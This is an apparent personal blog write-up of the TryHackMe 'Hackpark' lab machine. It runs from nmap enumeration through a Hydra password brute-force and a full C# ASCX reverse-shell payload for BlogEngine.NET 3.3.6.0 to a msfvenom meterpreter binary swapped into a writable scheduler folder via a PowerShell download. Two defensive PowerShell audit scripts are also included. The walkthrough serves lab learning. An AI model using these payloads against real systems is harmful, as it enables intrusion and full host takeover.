u915

Daniel Cano Merchán - Hacking & Tech

Writeup Tryhackme Hackpark

Writeup about the Tryhackme machine Hackpark

0 - Basic info

Windows machine

1 - Reconnaissance and enumeration

Starting with a nmap scan:

sudo nmap -sS -sC -sV -O -p- -oN scan.txt --script vuln 10.10.😄 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-15 21:08 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.😄
Host is up (0.044s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 8.5
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.😄
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.😄:80/
|     Form id: aspnetform
|     Form action: /
|     
|     Path: http://10.10.😄:80/Account/login.aspx?ReturnURL=/admin/
|     Form id: form1
|     Form action: login.aspx?ReturnURL=%2fadmin%2f
|     
|     Path: http://10.10.😄:80/author/Admin
|     Form id: aspnetform
|     Form action: /author/Admin
|     
|     Path: http://10.10.😄:80/archive
|     Form id: aspnetform
|     Form action: /archive
|     
|     Path: http://10.10.😄:80/post/welcome-to-hack-park
|     Form id: aspnetform
|_    Form action: /post/welcome-to-hack-park
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /calendar/cal_search.php: ExtCalendar
|   /robots.txt: Robots file
|   /calendar/cal_cat.php: Calendarix
|   /archive/: Potentially interesting folder
|   /archives/: Potentially interesting folder
|   /author/: Potentially interesting folder
|   /contact/: Potentially interesting folder
|   /contacts/: Potentially interesting folder
|   /search/: Potentially interesting folder
|_  /search-ui/: Potentially interesting folder
| http-fileupload-exploiter: 
|   
|_    Couldn't find a file-type field.
|_http-server-header: Microsoft-IIS/8.5
|_http-sql-injection: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3389/tcp open  ssl/ms-wbt-server?
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
|             Modulus Type: Safe prime
|             Modulus Source: RFC2409/Oakley Group 2
|             Modulus Length: 1024
|             Generator Length: 1024
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
|_sslv2-drown: 
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (98%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (98%), Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 426.68 seconds

Nmap shows ports 80 and 3389 open. Browsing port 80 reveals a blog. Nothing useful at first sight, but a login page can be found in the top right corner, behind the hamburger button.

Finally a BlogEngine.NET login form is shown.

Next I tried to brute-force the login form with the common username admin. To do that I captured the login POST with Burp Suite and reused its body as the Hydra payload, with rockyou.txt as the wordlist, as expected :) Here is the full trace:

┌──(u915☠😄)-[~/Escritorio/tryhackme/Hackpark]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.😄 http-post-form  "/Account/login.aspx:__VIEWSTATE=JPTbjwirnDJFCEBbQeN7xJtAGy%2Fq57IlIu8y4YlcYTE3zE2dqt49nK9LJsT6c9m5B89q0bRtC4p7IMAtEqMOl5jlBvvNPM46zNTCrTHRuoj1d5vaHJZH39tets2x6aH8%2BPNFcuum%2F8zzHHzw2T21uI77mXGALnl358tmuF6S4bG9sE%2BR&__EVENTVALIDATION=Gg4JqBaoqPoG0S8pdtQrXk3A3WwpiSdToFueLPLLMnmAGN%2F%2B466sLluOECWRSfmq%2F07I8tp6CdcwKvRNWeQCM8dtvldiZQkCUTyZxuQPjWQ8%2FHqXb31A7%2FawrnliIsw%2BR07OieBScmCyTPZoUs0kY8CG%2FB7tZ8YPzm%2F%2Fau4T7xQivjpo&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n:Login failed"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-01 12:56:49
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.😄:80/Account/login.aspx:__VIEWSTATE=JPTbjwirnDJFCEBbQeN7xJtAGy%2Fq57IlIu8y4YlcYTE3zE2dqt49nK9LJsT6c9m5B89q0bRtC4p7IMAtEqMOl5jlBvvNPM46zNTCrTHRuoj1d5vaHJZH39tets2x6aH8%2BPNFcuum%2F8zzHHzw2T21uI77mXGALnl358tmuF6S4bG9sE%2BR&__EVENTVALIDATION=Gg4JqBaoqPoG0S8pdtQrXk3A3WwpiSdToFueLPLLMnmAGN%2F%2B466sLluOECWRSfmq%2F07I8tp6CdcwKvRNWeQCM8dtvldiZQkCUTyZxuQPjWQ8%2FHqXb31A7%2FawrnliIsw%2BR07OieBScmCyTPZoUs0kY8CG%2FB7tZ8YPzm%2F%2Fau4T7xQivjpo&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n:Login failed
[80][http-post-form] host: 10.10.😄   login: admin   password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-01 12:57:37

So the credentials are admin/1qaz2wsx

2 - Vulnerability Identification

Inside the dashboard, the About menu shows the following info:

Version: 3.3.6.0
Configuration: Single blog
Trust level: Unrestricted
Identity: IIS APPPOOL\Blog
Blog provider: XmlBlogProvider
Membership provider: XmlMembershipProvider
Role provider: XmlRoleProvider

So version 3.3.6.0 is vulnerable and a public exploit is available:

https://www.exploit-db.com/exploits/46353

3 - Exploit

Following the exploit write-up: edit a post and click the toolbar icon that looks like an open folder; this opens a file manager through which a script can be uploaded.

The uploaded file is then reachable under the path /App_Data/files.

So, after basic changes such as the listener IP and port, the file is uploaded through the file manager. The name matters, do not change it: PostView.ascx.

http://10.10.😄//admin/app/editor/editpost.cshtml

<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
    static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);

        // Connect back to the listener; the IP and port are the only values changed from the exploit.
        using (System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.😄", 4445)) {
            using (System.IO.Stream stream = client.GetStream()) {
                using (System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
                    streamWriter = new System.IO.StreamWriter(stream);

                    StringBuilder strInput = new StringBuilder();

                    // Spawn cmd.exe with stdin/stdout/stderr redirected so they can be tied to the socket.
                    System.Diagnostics.Process p = new System.Diagnostics.Process();
                    p.StartInfo.FileName = "cmd.exe";
                    p.StartInfo.CreateNoWindow = true;
                    p.StartInfo.UseShellExecute = false;
                    p.StartInfo.RedirectStandardOutput = true;
                    p.StartInfo.RedirectStandardInput = true;
                    p.StartInfo.RedirectStandardError = true;
                    p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                    p.Start();
                    p.BeginOutputReadLine();

                    // Forward every line received from the socket to cmd.exe's stdin.
                    while (true) {
                        strInput.Append(rdr.ReadLine());
                        p.StandardInput.WriteLine(strInput);
                        strInput.Remove(0, strInput.Length);
                    }
                }
            }
        }
    }

    // Send each line of cmd.exe output back over the socket.
    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
        StringBuilder strOutput = new StringBuilder();

        if (!String.IsNullOrEmpty(outLine.Data)) {
            try {
                strOutput.Append(outLine.Data);
                streamWriter.WriteLine(strOutput);
                streamWriter.Flush();
            } catch (Exception err) { }
        }
    }
</script>

Handler on my machine:

nc -lvp 4445

Triggering the script: http://10.10.😄/?theme=../../App_Data/files

Great, a low-privileged reverse shell is in:

whoami
iis apppool\blog
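As an added detection check (my own snippet, not part of the writeup or of BlogEngine.NET), this PowerShell scan lists anything under the App_Data/files upload folder abused above that carries server-side code, either by extension or by content; $webRoot is an assumed IIS physical path.

```powershell
# Added detection check (not part of the writeup): list files in BlogEngine.NET's
# upload folder that carry server-side code. Legitimate themes ship PostView.ascx
# under /themes, but nothing under App_Data/files should be a web control.
$webRoot = 'C:\inetpub\wwwroot'                     # assumed IIS physical path
$uploadDir = Join-Path $webRoot 'App_Data\files'
$codeExtensions = @('.ascx', '.aspx', '.asax', '.ashx', '.asmx', '.cshtml')

Get-ChildItem -LiteralPath $uploadDir -Recurse -File | ForEach-Object {
    $byExtension = $codeExtensions -contains $_.Extension.ToLower()
    # Content check catches a control renamed to .txt or .jpg: the file used in
    # this writeup opens with an @ Control directive and a runat="server" block.
    $head = Get-Content -LiteralPath $_.FullName -TotalCount 20 -ErrorAction SilentlyContinue
    $byContent = (($head -join "`n") -match '<%@\s*(Control|Page)\b|runat\s*=\s*"server"')
    if ($byExtension -or $byContent) {
        [pscustomobject]@{
            Path     = $_.FullName
            Bytes    = $_.Length
            Modified = $_.LastWriteTimeUtc
            Reason   = $(if ($byExtension) { 'extension' } else { 'content' })
            SHA256   = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
        }
    }
}
```

The SHA256 and UTC modification time give you something to pivot on in IIS logs, where the upload and the later ?theme=../../App_Data/files request should both appear.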

4 - Post-Exploitation and privilege escalation

For this part I used winPEAS to look for privilege-escalation paths and found this interesting information:

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
Key: WScheduler
Folder: C:\Program Files (x86)\SystemScheduler
FolderPerms: Everyone [WriteData/CreateFiles]

skipping 1 line
FilePerms: Everyone [WriteData/CreateFiles]

So the binaries in that folder can be modified by anyone, which sounds interesting. Looking inside the path C:\Program Files (x86)\SystemScheduler:

meterpreter > cd Events
meterpreter > dir
Listing: c:\program files (x86)\Systemscheduler\Events
======================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  1927   fil   2019-08-05 00:05:19 +0200  20198415519.INI
100666/rw-rw-rw-  37381  fil   2019-08-05 00:06:01 +0200  20198415519.INI_LOG.txt
100666/rw-rw-rw-  290    fil   2020-10-02 23:50:12 +0200  2020102145012.INI
100666/rw-rw-rw-  186    fil   2021-06-01 12:01:40 +0200  Administrator.flg
100666/rw-rw-rw-  182    fil   2021-06-01 12:01:07 +0200  SYSTEM_svc.flg
100666/rw-rw-rw-  0      fil   2021-06-01 12:01:40 +0200  Scheduler.flg
100666/rw-rw-rw-  449    fil   2019-08-04 13:36:53 +0200  SessionInfo.flg
100666/rw-rw-rw-  0      fil   2021-06-01 12:01:07 +0200  service.flg

There is an interesting log file; looking inside:

meterpreter > cat 20198415519.INI_LOG.txt
08/04/19 15:06:01,Event Started Ok, (Administrator)
08/04/19 15:06:30,Process Ended. PID:2608,ExitCode:1,Message.exe (Administrator)
08/04/19 15:07:00,Event Started Ok, (Administrator)
08/04/19 15:07:34,Process Ended. PID:2680,ExitCode:4,Message.exe (Administrator)
08/04/19 15:08:00,Event Started Ok, (Administrator)
08/04/19 15:08:33,Process Ended. PID:2768,ExitCode:4,Message.exe (Administrator)
08/04/19 15:09:00,Event Started Ok, (Administrator)
08/04/19 15:09:34,Process Ended. PID:3024,ExitCode:4,Message.exe (Administrator)
08/04/19 15:10:00,Event Started Ok, (Administrator)
08/04/19 15:10:33,Process Ended. PID:1556,ExitCode:4,Message.exe (Administrator)
08/04/19 15:11:00,Event Started Ok, (Administrator)
08/04/19 15:11:33,Process Ended. PID:468,ExitCode:4,Message.exe (Administrator)
08/04/19 15:12:00,Event Started Ok, (Administrator)
08/04/19 15:12:33,Process Ended. PID:2244,ExitCode:4,Message.exe (Administrator)
08/04/19 15:13:00,Event Started Ok, (Administrator)
08/04/19 15:13:33,Process Ended. PID:1700,ExitCode:4,Message.exe (Administrator)
08/04/19 16:43:00,Event Started Ok,Can not display reminders while logged out. (SYSTEM_svc)*
08/04/19 16:44:01,Event Started Ok, (Administrator)
08/04/19 16:44:05,Process Ended. PID:2228,ExitCode:1,Message.exe (Administrator)
08/04/19 16:45:00,Event Started Ok, (Administrator)
08/04/19 16:45:20,Process Ended. PID:2640,ExitCode:1,Message.exe (Administrator)
08/04/19 16:46:00,Event Started Ok, (Administrator)

So the scheduler runs Message.exe as Administrator, about once a minute according to the log.
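As an added defender-side check (my own script, not part of the writeup or of winPEAS), this PowerShell audit walks the HKLM Run keys and reports autoruns whose executable or containing folder grants write rights to Everyone, Users or Authenticated Users, which is exactly the SystemScheduler weakness flagged above. It assumes an elevated shell on the host being audited.

```powershell
# Added audit (not part of the writeup): find HKLM Run autoruns whose binary or
# folder is writable by a broad principal, the weakness winPEAS reported here.
$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
)
# Principals that should never hold write rights on an autorun path.
$broadPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
# Any of these rights lets a low-privileged user swap the binary (WriteData and
# CreateFiles share one bit, hence winPEAS' "WriteData/CreateFiles").
$writeMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Write, Modify, FullControl, Delete, TakeOwnership, ChangePermissions'

function Get-WeakAce([string]$Path) {
    # Return the first Allow ACE granting a broad principal a write-class right.
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $null }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $broadPrincipals -contains $ace.IdentityReference.Value -and
            (($ace.FileSystemRights -band $writeMask) -ne 0)) {
            return "$($ace.IdentityReference) [$($ace.FileSystemRights)]"
        }
    }
    return $null
}

function Get-AutorunExe([string]$Command) {
    # Pull the executable out of a Run value: quoted path, or text up to ".exe".
    if ($Command -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($Command -match '^\s*(.+?\.exe)') { return $Matches[1] }
    return $Command.Trim()
}

foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    (Get-ItemProperty -Path $key).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' } |
        ForEach-Object {
            $exe = Get-AutorunExe $_.Value
            if (-not (Test-Path -LiteralPath $exe)) { return }   # skip entries that do not resolve
            [pscustomobject]@{
                Key         = $key
                Name        = $_.Name
                Executable  = $exe
                FileIssue   = Get-WeakAce $exe
                FolderIssue = Get-WeakAce (Split-Path -Parent $exe)
            }
        } | Where-Object { $_.FileIssue -or $_.FolderIssue }
}
```

On this box the WScheduler entry would be reported with a FolderIssue of Everyone [WriteData/CreateFiles]; the fix is to remove that ACE from the SystemScheduler folder and its binaries so only Administrators and SYSTEM can write there.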

The strategy is very simple: replace Message.exe with an msfvenom-generated .exe that spawns a reverse shell.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.😄 LPORT=9990 -f exe -o Message.exe

Served with Python from my machine and downloaded onto the TryHackMe box with PowerShell:

python3 -m http.server 7777
powershell -c "Invoke-WebRequest -Uri 'http://10.9.😄:7777/Message.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\Message.exe'"

After a few seconds the scheduler runs it and the handler catches the session, so the machine is rooted:

[*] Sending stage (176195 bytes) to 10.10.😄
[*] Meterpreter session 1 opened (10.9.**.**:3456 -> 10.10.😄:52832) at 2020-05-17 19:19:03 +0200
meterpreter > getuid 
Server username: HACKPARK\Administrator

Finally, grabbing the flags:

meterpreter > cat user.txt 
759b😄
meterpreter > cd C:\users\administrator\desktop
meterpreter > ls
Listing: C:\users\administrator\desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  1029  fil   2019-08-04 13:36:42 +0200  System Scheduler.lnk
100666/rw-rw-rw-  282   fil   2019-08-03 19:43:54 +0200  desktop.ini
100666/rw-rw-rw-  32    fil   2019-08-04 20:48:59 +0200  root.txt

meterpreter > cat root.txt
7e13😄

Thanks for reading!